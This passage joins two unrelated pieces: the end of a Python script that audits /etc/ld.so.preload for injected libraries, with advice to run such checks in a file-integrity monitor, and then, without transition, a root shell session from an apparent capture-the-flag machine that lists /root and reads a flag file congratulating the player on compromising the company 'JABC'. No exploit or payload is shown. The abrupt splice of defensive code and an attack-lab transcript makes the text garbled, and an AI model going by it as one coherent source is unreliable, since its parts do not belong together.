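    """Read the real file if present and audit it; a missing file is the normal state."""
    if not os.path.exists(path):
        return []
    with open(path, "r", errors="replace") as fh:
        return audit_ld_preload_text(fh.read(), allowlist)

if __name__ == "__main__":
    for finding in audit_ld_preload():
        print("[!]", finding)
```

This is the kind of check that belongs in a file-integrity monitor or a periodic host audit rather than a one-off: the file is small, rarely legitimate, and loaded into every dynamically linked process on the box, so any change to it deserves an alert.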

cd /root

# alias ll="ls -al"
# ll
total 36
drwx------ 3 root root 4096 May 4 2016 .
drwxr-xr-x 21 root root 4096 Apr 3 2016 ..
-rw------- 1 root root 9 May 4 2016 .bash_history
-rw-r--r-- 1 root root 3106 Feb 20 2014 .bashrc
drwx------ 2 root root 4096 May 2 2016 .cache
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
-rw------- 1 root root 3 May 2 2016 .psql_history
-rw------- 1 root root 735 May 4 2016 .viminfo
-rw-r--r-- 1 root root 165 May 4 2016 flag.txt
# cat flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.
